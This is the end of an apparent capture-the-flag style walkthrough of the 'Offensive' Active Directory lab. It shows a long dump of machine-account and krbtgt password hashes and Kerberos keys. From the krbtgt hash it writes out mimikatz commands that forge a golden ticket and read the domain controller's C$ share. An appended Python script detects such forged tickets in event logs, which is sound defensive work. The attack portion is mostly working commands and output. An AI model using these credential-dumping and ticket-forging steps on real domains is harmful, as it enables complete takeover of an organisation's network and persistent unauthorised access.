    Hash 02: 8a1d80f9f688a8c5c232d8487a800a9b
  LMHashHistory:
    Hash 01: c013317673496b06eb212e686bb7b727
    Hash 02: 830e0a79b463a53b6b471ff4756f6843
  SupplementalCredentials:
    ClearText:
    NTLMStrongHash:
    Kerberos:
      Credentials:
        DES_CBC_MD5
          Key: 89dc024f8f469ebc
      OldCredentials:
        DES_CBC_MD5
          Key: e679c707fbe62925
      Salt: OFFENSIVE.LOCALhostsql1.offensive.local
      Flags: 0
    KerberosNew:
      Credentials:
        AES256_CTS_HMAC_SHA1_96
          Key: eaf326c486cd87cb8d5e535cf5c74f26220261b7312f37b643c8e42a36c2a954
          Iterations: 4096
        AES128_CTS_HMAC_SHA1_96
          Key: 42442517fa581ac8ac63b67b59ef2f69
          Iterations: 4096
        DES_CBC_MD5
          Key: 89dc024f8f469ebc
          Iterations: 4096
      OldCredentials:
        AES256_CTS_HMAC_SHA1_96
          Key: 5070a3289087ef698aff67c0b150717c49187e99fe77b5901cbcc28fa1bf6532
          Iterations: 4096
        AES128_CTS_HMAC_SHA1_96
          Key: bab0a3db744c8d8142c35af31355a70c
          Iterations: 4096
        DES_CBC_MD5
          Key: e679c707fbe62925
          Iterations: 4096
      OlderCredentials:
      ServiceCredentials:
      Salt: OFFENSIVE.LOCALhostsql1.offensive.local
      DefaultIterationCount: 4096
      Flags: 0
    WDigest:
      Hash 01: ecc93ae46088e5771c47ffe686fedb5a
      Hash 02: b85432c985be922b9705a9db46db7ab0
      Hash 03: ecc93ae46088e5771c47ffe686fedb5a
      Hash 04: ecc93ae46088e5771c47ffe686fedb5a
      Hash 05: bb53a07906e61fa04baad5e972dc60a8
      Hash 06: bb53a07906e61fa04baad5e972dc60a8
      Hash 07: 4474f5d8af68778b9eb636b2546a1ad2
      Hash 08: 26e8b23879ed904180be8d5ca24a67de
      Hash 09: 3ce46aefa080a2b1c78780c83bb6c890
      Hash 10: cffaf1512bb51b355af1904b0ad7348a
      Hash 11: cffaf1512bb51b355af1904b0ad7348a
      Hash 12: 26e8b23879ed904180be8d5ca24a67de
      Hash 13: 26e8b23879ed904180be8d5ca24a67de
      Hash 14: e6b8e5d39655d8283f65de527dcc37c0
      Hash 15: f34002145595e74dbd5d10b7a5108373
      Hash 16: 30e8f147527873bfd62f8ba429235e13
      Hash 17: 7bdaeb0357e81c6557960a4085856758
      Hash 18: be5d65b938d13e934835293b045aed60
      Hash 19: 45ba74247bbfb9868625a91a95c42430
      Hash 20: be5d65b938d13e934835293b045aed60
      Hash 21: 8e207f6ee1950204d68f7fecddb458be
      Hash 22: e8eaf22ac82aa9025943c3eea33fb713
      Hash 23: 8e207f6ee1950204d68f7fecddb458be
      Hash 24: 93d2e3240fa6d7beda09d91b91ad5000
      Hash 25: d91dbe68b8f8de1520443941ce90b4fd
      Hash 26: 106534f2868125b461d7f953b88bac30
      Hash 27: 43f5b6861a7752bea23a0ff9b2730cfb
      Hash 28: b36480ae6e3ad7a9b16ae7ba271ad5f2
      Hash 29: 43f5b6861a7752bea23a0ff9b2730cfb
Key Credentials:
Credential Roaming
  Created:
  Modified:
  Credentials:

DistinguishedName: CN=CLIENT1,CN=Computers,DC=offensive,DC=local
Sid: S-1-5-21-1187620287-4058297830-2395299116-1107
Guid: c62b1cf1-aa56-4fbc-a57d-c85738369137
SamAccountName: CLIENT1$
SamAccountType: Computer
UserPrincipalName:
PrimaryGroupId: 515
SidHistory:
Enabled: True
UserAccountControl: WorkstationAccount
AdminCount: False
Deleted: False
LastLogon: 5/21/2025 11:48:26 PM
DisplayName: CLIENT1$
GivenName:
Surname:
Description:
ServicePrincipalName: {HOST/CLIENT1, RestrictedKrbHost/CLIENT1, HOST/Client1.offensive.local,
RestrictedKrbHost/Client1.offensive.local...}
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
SelfRelative
Owner: S-1-5-21-1187620287-4058297830-2395299116-512
Secrets
  NTHash: f35a35660a694c0210b900af487110e5
  LMHash:
  NTHashHistory:
    Hash 01: f35a35660a694c0210b900af487110e5
    Hash 02: d163be58e570bc2916759e1fbe6549e3
  LMHashHistory:
    Hash 01: 9e8a5b074ea559c2a100cd53b9d2d548
    Hash 02: 10cf41351365f7387bdeb9cceb37149c
  SupplementalCredentials:
    ClearText:
    NTLMStrongHash:
    Kerberos:
      Credentials:
        DES_CBC_MD5
          Key: 3bec083873a43e1f
      OldCredentials:
        DES_CBC_MD5
          Key: dc26a2a892ce2040
      Salt: OFFENSIVE.LOCALhostclient1.offensive.local
      Flags: 0
    KerberosNew:
      Credentials:
        AES256_CTS_HMAC_SHA1_96
          Key: 065eada218fe0652639d7a631c3cd4b86385d3028f4844642ddd7fde6edf8954
          Iterations: 4096
        AES128_CTS_HMAC_SHA1_96
          Key: 2aac7eaeb3f9eff20df5e9ac5615ae08
          Iterations: 4096
        DES_CBC_MD5
          Key: 3bec083873a43e1f
          Iterations: 4096
      OldCredentials:
        AES256_CTS_HMAC_SHA1_96
          Key: 83ae3346ed56fa3258422271103eaf1aea0569ed3806bf26b08524a54effa63d
          Iterations: 4096
        AES128_CTS_HMAC_SHA1_96
          Key: 9898b4c510ad33b3c3f8e87bfc8c9c40
          Iterations: 4096
        DES_CBC_MD5
          Key: dc26a2a892ce2040
          Iterations: 4096
      OlderCredentials:
      ServiceCredentials:
      Salt: OFFENSIVE.LOCALhostclient1.offensive.local
      DefaultIterationCount: 4096
      Flags: 0
    WDigest:
      Hash 01: 601b6bf5886cc098f31b8381eaa6a7a4
      Hash 02: e1d0983661bcfd4e8ae9ef49274f5f73
      Hash 03: 601b6bf5886cc098f31b8381eaa6a7a4
      Hash 04: 601b6bf5886cc098f31b8381eaa6a7a4
      Hash 05: 918633523b5b82f9e91da9bc4d15f303
      Hash 06: 918633523b5b82f9e91da9bc4d15f303
      Hash 07: f5957ca6e12a200b992044d0e2f9811b
      Hash 08: 6b6247188ef0875e60343ee8566e345c
      Hash 09: 78df026a98b333ff7de06b1cd7e4847e
      Hash 10: 3505b0760ba4343008d093af585f53a2
      Hash 11: 3505b0760ba4343008d093af585f53a2
      Hash 12: 6b6247188ef0875e60343ee8566e345c
      Hash 13: 6b6247188ef0875e60343ee8566e345c
      Hash 14: 57f385c2d17ecee2a2606e67bf6f5c2a
      Hash 15: 6ebcf69f9efcea9f0eb7233f545023bc
      Hash 16: ce9faa4f42b9804e3a568134af281660
      Hash 17: 11bfa2ec83d4f1bef71a49df1c464733
      Hash 18: 45e79344fd4ebdef212fc046c15b180b
      Hash 19: 9640aefa1fcdfe98549f61dd363d04b2
      Hash 20: 45e79344fd4ebdef212fc046c15b180b
      Hash 21: ec1b3218d17f2daf0ba1009b4d4a2ceb
      Hash 22: 8d6ac11969172e6b8bbc21dc64810a32
      Hash 23: ec1b3218d17f2daf0ba1009b4d4a2ceb
      Hash 24: 7e11bc36cb4bde1b3c47fca9158ccd59
      Hash 25: 2b1b4e4fb5c52ea51e3dd840a0dcdf58
      Hash 26: 32cddd1c07fd2e92733c8fb23294fc58
      Hash 27: 48f7c3b70fa387eff4f28b73c3dd69c8
      Hash 28: 2cce025286c581ccb040873d40adda1e
      Hash 29: 48f7c3b70fa387eff4f28b73c3dd69c8
Key Credentials:
Credential Roaming
  Created:
  Modified:
  Credentials:

DistinguishedName: CN=OFFENSIVE-SQL1,CN=Computers,DC=offensive,DC=local
Sid: S-1-5-21-1187620287-4058297830-2395299116-1601
Guid: 879e3840-a795-4733-80ad-c86f2a0f3b89
SamAccountName: OFFENSIVE-SQL1$
SamAccountType: Computer
UserPrincipalName:
PrimaryGroupId: 515
SidHistory:
Enabled: True
UserAccountControl: WorkstationAccount
AdminCount: False
Deleted: False
LastLogon: 5/21/2025 11:53:26 PM
DisplayName:
GivenName:
Surname:
Description:
ServicePrincipalName: {HOST/Offensive-SQL1.offensive.local, RestrictedKrbHost/Offensive-SQL1.offensive.local,
HOST/OFFENSIVE-SQL1, RestrictedKrbHost/OFFENSIVE-SQL1...}
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
SelfRelative
Owner: S-1-5-21-1187620287-4058297830-2395299116-512
Secrets
  NTHash: d0758c8de2306c7c45818adccfa82c6e
  LMHash:
  NTHashHistory:
    Hash 01: d0758c8de2306c7c45818adccfa82c6e
    Hash 02: 00d43d5ee51193638bcee3e59a83f9ae
  LMHashHistory:
    Hash 01: b1daca81ae1ce2e1c9344b8d9c4636ce
    Hash 02: 08c1995d7dbeffbfe83b947d8e9dfe8e
  SupplementalCredentials:
    ClearText:
    NTLMStrongHash:
    Kerberos:
      Credentials:
        DES_CBC_MD5
          Key: 0bc78ad080f25275
      OldCredentials:
        DES_CBC_MD5
          Key: 4a16041c01648c34
      Salt: OFFENSIVE.LOCALhostoffensive-sql1.offensive.local
      Flags: 0
    KerberosNew:
      Credentials:
        AES256_CTS_HMAC_SHA1_96
          Key: 749b134a380d7bbab260fee764233725261c7374ddb7a8befd2574979c3375d6
          Iterations: 4096
        AES128_CTS_HMAC_SHA1_96
          Key: 810fe77f95b0ae4fa93deba2ef6bdd07
          Iterations: 4096
        DES_CBC_MD5
          Key: 0bc78ad080f25275
          Iterations: 4096
      OldCredentials:
        AES256_CTS_HMAC_SHA1_96
          Key: 45baa4b9dc90d32d5b3c4c59f08116e3f266161e76b8693a99db2e67a649c00a
          Iterations: 4096
        AES128_CTS_HMAC_SHA1_96
          Key: e502b718eeceb4bed26778f5037da446
          Iterations: 4096
        DES_CBC_MD5
          Key: 4a16041c01648c34
          Iterations: 4096
      OlderCredentials:
      ServiceCredentials:
      Salt: OFFENSIVE.LOCALhostoffensive-sql1.offensive.local
      DefaultIterationCount: 4096
      Flags: 0
    WDigest:
      Hash 01: f8be0ab14325a041bae17ddb16e0297e
      Hash 02: cf4e36ed4a2ef37d951658680097a601
      Hash 03: f8be0ab14325a041bae17ddb16e0297e
      Hash 04: f8be0ab14325a041bae17ddb16e0297e
      Hash 05: 3b561a5da67c37bd77e04c0539d65b23
      Hash 06: 3b561a5da67c37bd77e04c0539d65b23
      Hash 07: 48378aea7cc2350629cb085cd6e988b7
      Hash 08: 8c71a5cc9147a06a18d13ecad28480a8
      Hash 09: e046518cc4f3ba0187df94cb1af071f1
      Hash 10: 11e1497b8094eccf5af12de6a4958037
      Hash 11: 11e1497b8094eccf5af12de6a4958037
      Hash 12: 8c71a5cc9147a06a18d13ecad28480a8
      Hash 13: 8c71a5cc9147a06a18d13ecad28480a8
      Hash 14: b237085d8f49603dc25875194d12e144
      Hash 15: d6db51ead7593aff3cce1b10c9f7d084
      Hash 16: a621df72a064b64244442d2afc037076
      Hash 17: d073553de8a3e7f289a3b4f108da3cdc
      Hash 18: 7cfe2ca8e225ae819c28051ad1910a42
      Hash 19: aa736ceb0ae99a5872d9be8b64298c96
      Hash 20: 7cfe2ca8e225ae819c28051ad1910a42
      Hash 21: 977a3dde0228a36a9e8d2b912666b765
      Hash 22: c02a74fe0c5978353634681982376f0a
      Hash 23: 977a3dde0228a36a9e8d2b912666b765
      Hash 24: 2f0aa43e0ecd165304be79caadbae2f0
      Hash 25: 28897eef01e6d42f168548554ac10358
      Hash 26: 9f71bffc306299c934a8d6150fdf7864
      Hash 27: 343bd1f624e42679f0a5d465f392c2c7
      Hash 28: 397774b2a8e1ff2693447dab8c3a2c5b
      Hash 29: 343bd1f624e42679f0a5d465f392c2c7
Key Credentials:
Credential Roaming
  Created:
  Modified:
  Credentials:

Decryption succeeded, and we find the krbtgt key:

DistinguishedName: CN=krbtgt,CN=Users,DC=offensive,DC=local
Sid: S-1-5-21-1187620287-4058297830-2395299116-502
Guid: 9069b2a1-dc1f-4304-bd7d-75c2981ce733
SamAccountName: krbtgt
SamAccountType: User
UserPrincipalName:
PrimaryGroupId: 513
SidHistory:
Enabled: False
UserAccountControl: Disabled, NormalAccount
AdminCount: True
Deleted: False
LastLogon:
DisplayName:
GivenName:
Surname:
Description: Key Distribution Center Service Account
ServicePrincipalName: {kadmin/changepw}
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
DiscretionaryAclProtected, SelfRelative
Owner: S-1-5-21-1187620287-4058297830-2395299116-512
Secrets
  NTHash: 61d83c569b93bfcd4ca2087011361caa
  LMHash:
  NTHashHistory:
    Hash 01: 61d83c569b93bfcd4ca2087011361caa
  LMHashHistory:
    Hash 01: 8a0c759ba84902c107491a110cc5eb11
  SupplementalCredentials:
    ClearText:
    NTLMStrongHash: 03e46263c90a310e6120dbb0443d2775
    Kerberos:
      Credentials:
        DES_CBC_MD5
          Key: 26cdb9166b8a5897
      OldCredentials:
      Salt: OFFENSIVE.LOCALkrbtgt
      Flags: 0
    KerberosNew:
      Credentials:
        AES256_CTS_HMAC_SHA1_96
          Key: dbae18467bd2eeb7eb2679e759b2b14d0755c1a4c3757b2f475399bb4ddb73b2
          Iterations: 4096
        AES128_CTS_HMAC_SHA1_96
          Key: acf72b52482ca2fd5e3b4b7b4082bb98
          Iterations: 4096
        DES_CBC_MD5
          Key: 26cdb9166b8a5897
          Iterations: 4096
      OldCredentials:
      OlderCredentials:
      ServiceCredentials:
      Salt: OFFENSIVE.LOCALkrbtgt
      DefaultIterationCount: 4096
      Flags: 0
Key Credentials:
Credential Roaming
  Created:
  Modified:
  Credentials:

The key is:

61d83c569b93bfcd4ca2087011361caa

Requirements for forging a golden ticket:

  • the domain name
  • the domain SID
  • the NTLM hash of the domain's KRBTGT account
  • an arbitrary (made-up) user name

Forge the golden ticket with mimikatz:

kerberos::golden /sid:S-1-5-21-1187620287-4058297830-2395299116 /domain:offensive.local /rc4:61d83c569b93bfcd4ca2087011361caa /user:idontexist /id:500 (saved to a file)

kerberos::golden /sid:S-1-5-21-1187620287-4058297830-2395299116 /domain:offensive.local /rc4:61d83c569b93bfcd4ca2087011361caa /user:idontexist /id:500 /ptt (kept in memory)

kerberos::list  view the tickets

dir \\dc.offensive.local\c$

Now we can read the domain controller's files directly.
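From the defender's side, the ticket above names a user (idontexist) that does not exist and gives it RID 500, so the 4769/4624 events it produces on the DC carry a name that is not in the directory, or a name that does not belong to the SID it is paired with. As an added example (not part of the original post or the lab's tooling), the Python below checks flattened event lines against the accounts listed in the dump; the log lines and the name of RID 500 are constructed assumptions.

```python
import re

DOMAIN_SID = "S-1-5-21-1187620287-4058297830-2395299116"

# RID -> SamAccountName, taken from the DSInternals dump on the page.
# RID 500 (built-in Administrator) is assumed to keep its default name;
# that record is not shown on the page.
DIRECTORY = {
    500: "Administrator",
    502: "krbtgt",
    1000: "DC$",
    1106: "SQL1$",
    1107: "CLIENT1$",
    1601: "OFFENSIVE-SQL1$",
}

# Constructed sample: a flattened key=value rendering of the fields a 4769
# (TGS request) and a 4624 (logon) event carry. Not real event log output.
SAMPLE_LOG = """\
EventID=4769 TargetUserName=CLIENT1$@OFFENSIVE.LOCAL ServiceName=cifs/dc.offensive.local IpAddress=192.168.159.10
EventID=4769 TargetUserName=idontexist@OFFENSIVE.LOCAL ServiceName=cifs/dc.offensive.local IpAddress=192.168.159.10
EventID=4624 TargetUserName=CLIENT1$ TargetUserSid=S-1-5-21-1187620287-4058297830-2395299116-1107 LogonType=3 AuthenticationPackageName=Kerberos
EventID=4624 TargetUserName=idontexist TargetUserSid=S-1-5-21-1187620287-4058297830-2395299116-500 LogonType=3 AuthenticationPackageName=Kerberos
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one flattened event line into a dict of its fields."""
    return dict(FIELD_RE.findall(line))


def check_event(event, directory=DIRECTORY, domain_sid=DOMAIN_SID):
    """Return the findings for one event; an empty list means it is consistent."""
    findings = []
    # 4769 carries user@REALM, 4624 carries the bare SAM name.
    name = event.get("TargetUserName", "").split("@")[0]
    if name.lower() not in {n.lower() for n in directory.values()}:
        findings.append(f"account '{name}' does not exist in the directory")
    sid = event.get("TargetUserSid")
    if sid and sid.startswith(domain_sid + "-"):
        rid = int(sid.rsplit("-", 1)[1])
        owner = directory.get(rid)
        if owner is None:
            findings.append(f"RID {rid} is not a known account")
        elif owner.lower() != name.lower():
            findings.append(f"name '{name}' does not match SID owner '{owner}' (RID {rid})")
    return findings


def scan_log(text, **kw):
    """Return (line_number, findings) for every event that fails a check."""
    alerts = []
    for n, line in enumerate(text.splitlines(), 1):
        if line.strip():
            findings = check_event(parse_event(line), **kw)
            if findings:
                alerts.append((n, findings))
    return alerts


if __name__ == "__main__":
    for n, findings in scan_log(SAMPLE_LOG):
        print(f"line {n}: " + "; ".join(findings))
```

A ticket forged with a name that does exist passes the name check, so the SID-to-name comparison is the stronger of the two; the forged ticket itself stays valid until the krbtgt password has been reset twice.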

And that's the end!

References:
https://www.anquanke/post/id/193431#h2-5

https://wh0ale.github.io/2019/12/16/Offensive%E5%9F%9F%E7%8E%AF%E5%A2%83%E9%9D%B6%E5%9C%BA%E6%B8%97%E9%80%8F/

Tags: lab machine, Offensive